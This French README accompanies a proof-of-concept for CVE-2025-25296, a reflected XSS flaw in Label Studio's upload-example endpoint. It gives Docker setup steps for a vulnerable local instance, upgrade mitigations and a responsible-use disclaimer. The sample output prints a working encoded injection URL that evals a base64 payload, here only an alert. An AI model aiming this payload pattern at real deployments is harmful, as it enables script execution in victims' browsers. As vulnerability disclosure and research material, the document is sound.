
Preuve de concept (POC) pour la vulnérabilité CVE-2025-25296 affectant les versions de Label Studio antérieures à 1.16.0
Ce projet démontre une preuve de concept (POC) pour la vulnérabilité CVE-2025-25296 affectant Label Studio, un outil open-source d'annotation de données. La vulnérabilité réside dans le endpoint /projects/upload-example, qui ne parvient pas à assainir le contenu HTML fourni par l'utilisateur dans les requêtes GET. Cela permet à des attaquants d'exécuter du JavaScript arbitraire dans le navigateur de la victime, conduisant à des attaques potentielles de Cross-Site Scripting (XSS).
/projects/upload-example de Label Studio1.16.0 ou ultérieureComme contournement temporaire :
/projects/upload-example avec des requêtes GET.pip à l'aide de setup.sh)poc.py : Script Python pour exploiter la vulnérabilité et démontrer l'attaque XSS.setup.sh : Script pour configurer l'environnement vulnérable à l'aide de Docker.Clonez ce dépôt :
git clone CVE-2025-25296-POC
cd CVE-2025-25296-POC
Exécutez le script de configuration :
chmod +x setup.sh
./setup.sh
Le script de configuration va :
1.15.0).localhost:8080.Exécutez le script d'exploitation :
python poc.py
Le script va :
/projects/upload-example.Ouvrez l'URL fournie dans un navigateur web pour observer l'alerte XSS déclenchée par la charge utile.
[*] Attempting to send XSS payload...
[+] Payload successfully sent!
[+] Check this URL in a browser: http://localhost:8080/projects/upload-example/?label_config=%3CView%3E%3C!--%20%7B%22data%22%3A%20%7B%22text%22%3A%20%22%3Cdiv%3E%3Cimg%20src%3Dx%20onerror%3Deval(atob(%60YWxlcnQoIlhTUyIp%60))%3E%3C/div%3E%22%7D%7D%20--%3E%3CHyperText%20name%3D%22text%22%20value%3D%22%24text%22/%3E%3C/View%3E
Pour atténuer cette vulnérabilité :
1.16.0 ou ultérieure.Ce projet est destiné uniquement à des fins éducatives et de recherche. Utilisez-le de manière responsable et uniquement sur des systèmes pour lesquels vous disposez d'une autorisation explicite. Toute utilisation non autorisée de cet outil peut enfreindre les lois applicables.